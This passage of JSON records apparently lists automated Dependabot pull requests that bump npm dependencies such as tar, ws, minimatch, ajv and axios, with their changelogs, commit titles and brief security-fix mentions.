href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yauzl` from 3.2.0 to 3.2.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/c4695215b05c6adffda613b9051a2a85429b33fe\"\u003e\u003ccode\u003ec469521\u003c/code\u003e\u003c/a\u003e version 3.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/00c561b8cf1ff92e076f7087ac6287e510d4af54\"\u003e\u003ccode\u003e00c561b\u003c/code\u003e\u003c/a\u003e fix bounds checking logic on NtfsTimestamp\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/277b294d23fc1c10ff772fa5e858830ca79d9892\"\u003e\u003ccode\u003e277b294\u003c/code\u003e\u003c/a\u003e comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/de292f220268473eb20aef64b0a77faa9d004d9a\"\u003e\u003ccode\u003ede292f2\u003c/code\u003e\u003c/a\u003e streamed zip file test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/e00f13978fe284d60199014f567fb9efc4df8499\"\u003e\u003ccode\u003ee00f139\u003c/code\u003e\u003c/a\u003e truncate long test file names for eCryptfs compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/d98e05247dc7b95f5f0bcd336a81aca6d8563b95\"\u003e\u003ccode\u003ed98e052\u003c/code\u003e\u003c/a\u003e fix name of Info-ZIP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/a8951a29884b9506b695575037bee608b09592cc\"\u003e\u003ccode\u003ea8951a2\u003c/code\u003e\u003c/a\u003e update readme\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/thejoshwolfe/yauzl/compare/3.2.0...3.2.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.4.5 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.4.3 to 7.5.13\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-tar/blob/main/CHANGELOG.md\"\u003etar's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003ch2\u003e7.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003ezstd\u003c/code\u003e compression support.\u003c/li\u003e\n\u003cli\u003eConsistent TOCTOU behavior in sync t.list\u003c/li\u003e\n\u003cli\u003eOnly read from ustar block if not specified in Pax\u003c/li\u003e\n\u003cli\u003eFix sync tar.list when file size reduces while reading\u003c/li\u003e\n\u003cli\u003eSanitize absolute linkpaths properly\u003c/li\u003e\n\u003cli\u003ePrevent writing hardlink entries to the archive ahead of their\nfile target\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eonentry\u003c/code\u003e in favor of \u003ccode\u003eonReadEntry\u003c/code\u003e for clarity.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eonWriteEntry\u003c/code\u003e option\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDRY the command definitions into a single \u003ccode\u003emakeCommand\u003c/code\u003e method,\nand update the type signatures to more appropriately infer the\nreturn type from the options and arguments provided.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate minipass to v7.1.0\u003c/li\u003e\n\u003cli\u003eUpdate the type definitions of \u003ccode\u003ewrite()\u003c/code\u003e and \u003ccode\u003eend()\u003c/code\u003e methods on\n\u003ccode\u003eUnpack\u003c/code\u003e and \u003ccode\u003eParser\u003c/code\u003e classes to be compatible with the\nNodeJS.WritableStream type in the latest versions of\n\u003ccode\u003e@types/node\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node \u0026lt;18\u003c/li\u003e\n\u003cli\u003eRewrite in TypeScript, provide ESM and CommonJS hybrid\ninterface\u003c/li\u003e\n\u003cli\u003eAdd tree-shake friendly exports, like \u003ccode\u003eimport('tar/create')\u003c/code\u003e\nand \u003ccode\u003eimport('tar/read-entry')\u003c/code\u003e to get individual functions or\nclasses.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003echmod\u003c/code\u003e option that defaults to false, and deprecate\n\u003ccode\u003enoChmod\u003c/code\u003e. That is, reverse the default option regarding\nexplicitly setting file system modes to match tar entry\nsettings.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eprocessUmask\u003c/code\u003e option to avoid having to call\n\u003ccode\u003eprocess.umask()\u003c/code\u003e when \u003ccode\u003echmod: true\u003c/code\u003e (or \u003ccode\u003enoChmod: false\u003c/code\u003e) is\nset.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/d6611ae951056addb77c6e11baf7bcc9d7648e46\"\u003e\u003ccode\u003ed6611ae\u003c/code\u003e\u003c/a\u003e 7.5.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/119c401f4f7efbeb112d28f9dfc9c489674c9a79\"\u003e\u003ccode\u003e119c401\u003c/code\u003e\u003c/a\u003e fix(extract): prevent raced symlink writes outside cwd\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/2a294d3fbb24c18dc80f31059f49dd9af15653fe\"\u003e\u003ccode\u003e2a294d3\u003c/code\u003e\u003c/a\u003e 7.5.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/01082a42c3256ca6054f9627911cce4dbfe00d92\"\u003e\u003ccode\u003e01082a4\u003c/code\u003e\u003c/a\u003e fix: reject top promise on floating addFilesAsync rejections\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/dd1c36ab7acff26e5a34935d17f27a45bb088db3\"\u003e\u003ccode\u003edd1c36a\u003c/code\u003e\u003c/a\u003e linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/35a1ffe73eb4aa05cd2613f8fdcfb4c9c9ed59f9\"\u003e\u003ccode\u003e35a1ffe\u003c/code\u003e\u003c/a\u003e doc: more clarity in security warning\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/2b72abc1d47c3570e1ad95c9ab557fc4c2e6e4b1\"\u003e\u003ccode\u003e2b72abc\u003c/code\u003e\u003c/a\u003e 7.5.10\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.4.3...v7.5.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~isaacs\"\u003eisaacs\u003c/a\u003e, a new releaser for tar since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 7.5.8 to 7.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e7.5.10\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported e55e5106 to the 7.x release line (22c28763).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.5.9\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported bc8bd34e to the 7.x release line (0435e6e1).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/d962d70649e393841ee1ed726a8f7ffbe90d0c06\"\u003e\u003ccode\u003ed962d70\u003c/code\u003e\u003c/a\u003e [dist] 7.5.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f\"\u003e\u003ccode\u003e22c2876\u003c/code\u003e\u003c/a\u003e [security] Fix crash when the Upgrade header cannot be read (\u003ca href=\"https://redirect.github.com/websockets/ws/issues/2231\"\u003e#2231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/8a78f8770618cc5a1ade485a7445cb6d6f46e2f2\"\u003e\u003ccode\u003e8a78f87\u003c/code\u003e\u003c/a\u003e [dist] 7.5.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/0435e6e12b8d38992cf0651cb8605dde2294bd25\"\u003e\u003ccode\u003e0435e6e\u003c/code\u003e\u003c/a\u003e [security] Fix same host check for ws+unix: redirects\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/websockets/ws/compare/7.5.8...7.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `handlebars` from 4.7.8 to 4.7.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/releases\"\u003ehandlebars's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab...\n\n_Description has been truncated_","html_url":"https://github.com/preechapon250/strapi/pull/23","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/preechapon250%2Fstrapi/issues/23","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/23/packages"},{"uuid":"4180617021","node_id":"PR_kwDOLinjCM7PAQAk","number":1232,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 23 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-01T08:10:45.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-31T16:29:47.000Z","updated_at":"2026-04-01T08:10:47.000Z","time_to_close":56458,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":23,"packages":[{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"@octokit/plugin-paginate-rest","old_version":"6.1.2","new_version":"removed","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"diff","old_version":"5.2.0","new_version":"5.2.2","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.3.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"yaml","old_version":"2.6.0","new_version":"2.8.3","repository_url":"https://github.com/eemeli/yaml"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 8 updates in the /src/praisonai directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `6.1.2` | `removed` |\n| [diff](https://github.com/kpdecker/jsdiff) | `5.2.0` | `5.2.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.1` | `3.4.2` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [yaml](https://github.com/eemeli/yaml) | `2.6.0` | `2.8.3` |\n\nBumps the npm_and_yarn group with 13 updates in the /src/praisonai-ts directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [body-parser](https://github.com/expressjs/body-parser) | `2.2.0` | `2.2.2` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.3` | `3.4.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `8.2.0` | `8.4.1` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [qs](https://github.com/ljharb/qs) | `6.14.0` | `6.15.0` |\n| [@modelcontextprotocol/sdk](https://github.com/modelcontextprotocol/typescript-sdk) | `1.12.1` | `1.26.0` |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.5.3` | `5.5.7` |\n| [@eslint/plugin-kit](https://github.com/eslint/rewrite/tree/HEAD/packages/plugin-kit) | `0.3.1` | `0.3.5` |\n\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.1.2 to 3.1.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.1.2...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nRemoves `@octokit/plugin-paginate-rest`\n\nUpdates `axios` from 1.7.9 to 1.10.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eRelease v1.10.0\u003c/h2\u003e\n\u003ch2\u003eRelease notes:\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eadapter:\u003c/strong\u003e pass fetchOptions to fetch function (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6883\"\u003e#6883\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/0f50af8e076b7fb403844789bd5e812dedcaf4ed\"\u003e0f50af8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eform-data:\u003c/strong\u003e convert boolean values to strings in FormData serialization (\u003ca href=\"https://redirect.github.com/axios/axios/issues/6917\"\u003e#6917\u003c/a\u003e) (\u003ca href=\"https://github.com/axios/axios/commit/5064b108de336ff34862650709761b8a96d26be0\"\u003e5064b10\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003epackage:\u003c/strong\u003e add module entry point for React Native; (\u003ca 